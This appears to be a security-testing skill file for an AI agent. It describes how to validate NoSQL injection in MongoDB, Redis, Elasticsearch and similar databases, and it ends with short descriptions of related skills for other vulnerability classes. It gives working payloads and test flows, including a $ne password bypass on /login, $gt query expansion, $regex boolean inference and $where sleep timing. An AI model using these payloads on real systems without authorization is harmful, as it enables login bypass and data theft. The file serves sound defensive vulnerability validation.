// Validate NoSQL injection vulnerabilities across MongoDB, Cassandra, CouchDB, Redis, and other NoSQL databases. Test operator injection, JavaScript injection, and query manipulation patterns. Use when testing CWE-943 (Improper Neutralization of Special Elements in Data Query Logic) and related NoSQL injection classes.
| name | nosql-injection-testing |
| description | Validate NoSQL injection vulnerabilities across MongoDB, Cassandra, CouchDB, Redis, and other NoSQL databases. Test operator injection, JavaScript injection, and query manipulation patterns. Use when testing CWE-943 (Improper Neutralization of Special Elements in Data Query Logic) and related NoSQL injection classes. |
| allowed-tools | Read, Write, Bash |
Validate NoSQL injection vulnerabilities by injecting special operators, JavaScript code, or malformed queries into user-controlled inputs and observing:
$ne, $gt, $regex)$where, mapReduce)Inject MongoDB query operators to manipulate query logic.
Detection Methods:
{"$ne": ""} — not equal empty, bypasses equality checks{"$gt": ""} — greater than empty, returns all matching documents{"$regex": ".*"} — regex wildcard match{"$or": [...]} — logical OR injectionExample Attack:
// Normal: {"username": "admin", "password": "secret"}
// Attack: {"username": "admin", "password": {"$ne": ""}}
// Effect: Returns admin user regardless of password
Inject JavaScript in databases supporting server-side execution.
Detection Methods:
$where clause injection: {"$where": "this.password.length > 0"}mapReduce function injection$function aggregation operator (MongoDB 4.4+)Example Attack:
// Payload: {"$where": "sleep(5000) || true"}
// Effect: 5-second delay if JS execution enabled
Exploit type confusion when arrays or objects are passed where strings expected.
Detection Methods:
username[$ne]= via query string (Express.js extended query parser)items[0]=maliciousInject into MongoDB aggregation pipelines.
Detection Methods:
$lookup injection for cross-collection access$out or $merge for write operations$group manipulation for data extraction| Database | Operator Injection | JS Injection | Boolean-Based | Time-Based |
|---|---|---|---|---|
| MongoDB | ✓ ($ne, $gt, $regex, $or) | ✓ ($where, mapReduce) | ✓ | ✓ (via $where sleep or heavy ops) |
| CouchDB | ✓ (view manipulation) | ✓ (design doc JS) | ✓ | Limited |
| Cassandra | Limited (CQL injection) | No | ✓ | Limited |
| Redis | Command injection patterns | Lua script injection | ✓ | ✓ (DEBUG SLEEP) |
| Elasticsearch | ✓ (query DSL manipulation) | ✓ (scripting if enabled) | ✓ | ✓ (script-based) |
| DynamoDB | Condition expression injection | No | ✓ | No |
Key Insight: NoSQL APIs typically accept JSON; look for object/array inputs where operators can be injected.
Operator Injection (Authentication Bypass):
# Baseline
baseline = post("/login", json={"username": "admin", "password": "wrong"})
# Expected: 401 Unauthorized
# Test with $ne operator
test = post("/login", json={"username": "admin", "password": {"$ne": ""}})
# If 200 OK: VALIDATED - operator injection bypassed auth
Operator Injection (Data Extraction):
# Baseline
baseline = get("/api/users?role=user")
# Expected: Returns only users with role="user"
# Test with $gt operator
test = get("/api/users?role[$gt]=")
# If returns more users: VALIDATED - operator injection expanded query
Boolean-Based Inference:
# True condition
true_resp = post("/api/search", json={"name": {"$regex": "^a"}})
# False condition
false_resp = post("/api/search", json={"name": {"$regex": "^zzzzz"}})
# Compare response lengths/content
if len(true_resp.text) != len(false_resp.text):
status = "VALIDATED"
JavaScript Injection (if enabled):
# Time-based test
baseline_time = measure(post("/api/query", json={"filter": "normal"}))
test_time = measure(post("/api/query", json={"$where": "sleep(5000) || true"}))
if test_time > baseline_time + 4.5:
status = "VALIDATED"
| Status | Meaning |
|---|---|
| VALIDATED | Clear NoSQLi indicators (auth bypass, data leak, JS execution, boolean/time diff) |
| FALSE_POSITIVE | No indicators; operators rejected or sanitized |
| PARTIAL | Weak signals (small differences, inconsistent results) |
| UNVALIDATED | Blocked, error, or insufficient evidence |
Capture minimal structured evidence (redact PII/secrets, truncate to 8KB, hash full response):
status, injection_type, cwe$out, db.dropDatabase())Validated examples:
NoSQL injection on /login - $ne operator bypassed password check (CWE-943). Admin access without credentials.
MongoDB $where injection on /api/search - sleep(5000) caused 5.1s delay (CWE-943). Server-side JS execution confirmed.
Operator injection on /api/users - $gt operator returned all users instead of filtered set (CWE-943).
Unvalidated example:
NoSQL injection test incomplete on /api/data - operators rejected with 400 Bad Request. Evidence: path/to/evidence.json
Primary CWE (DAST-testable):
Parent/Related CWEs (context):
Sibling CWEs under CWE-943 (for reference):
Related Attack Pattern:
Note: Unlike SQL injection (CWE-89), NoSQL injection does not have a dedicated base-level CWE. CWE-943 at the class level is the correct mapping for NoSQL injection vulnerabilities per MITRE guidance.
--noscripting)reference/nosql_payloads.py for NoSQLi payloads by database typereference/validate_nosqli.py for NoSQLi-focused validation flowexamples.md for concrete NoSQLi scenarios and evidence formatsValidate Server-Side Request Forgery (SSRF) vulnerabilities by testing if user-controlled URLs can reach internal services, cloud metadata endpoints, or alternative protocols. Use when testing CWE-918 (SSRF), CWE-441 (Unintended Proxy), CWE-611 (XXE leading to SSRF), or findings involving URL fetching, webhooks, file imports, image/PDF/SVG processing, or XML parsing with external entities.
Validate OS Command Injection vulnerabilities including direct command injection, blind command injection via time delays, and out-of-band command execution. Test by injecting shell metacharacters and commands into user-controlled inputs. Use when testing CWE-78 (OS Command Injection), CWE-77 (Command Injection), CWE-88 (Argument Injection), or related command execution vulnerabilities.
Validate SQL injection vulnerabilities (including blind SQLi) across time-based, error-based, boolean-based, UNION-based, stacked-query, and out-of-band patterns. Use when testing CWE-89 (SQL Injection), CWE-564 (Hibernate SQL Injection), and related SQL injection classes across MySQL, PostgreSQL, MSSQL, Oracle, and SQLite targets.
Validate Cross-Site Scripting (XSS) vulnerabilities including Reflected, Stored, and DOM-based XSS. Test by injecting script payloads into user-controlled inputs and observing if they execute in browser context. Use when testing CWE-79 (XSS), CWE-80 (Basic XSS), CWE-81 (Error Message XSS), CWE-83 (Attribute XSS), CWE-84 (URI Scheme XSS), CWE-85 (Doubled Character XSS), CWE-86 (Invalid Character XSS), CWE-87 (Alternate XSS Syntax), or related XSS findings.
Validate XML External Entity (XXE) injection vulnerabilities including file disclosure, SSRF, denial of service, and blind XXE via out-of-band channels. Test by injecting malicious XML with external entity references into endpoints that parse XML. Use when testing CWE-611 (XXE), CWE-827 (Improper Control of Document Type Definition), or related XML parsing vulnerabilities.
Validate authorization failures including IDOR, privilege escalation, and missing access controls. Test by attempting unauthorized access with lower-privileged credentials. Use when testing CWE-639 (IDOR), CWE-269 (Improper Privilege Management), CWE-862 (Missing Authorization), CWE-863 (Incorrect Authorization), CWE-284 (Improper Access Control), CWE-285 (Improper Authorization), or CWE-425 (Direct Request / Forced Browsing) findings.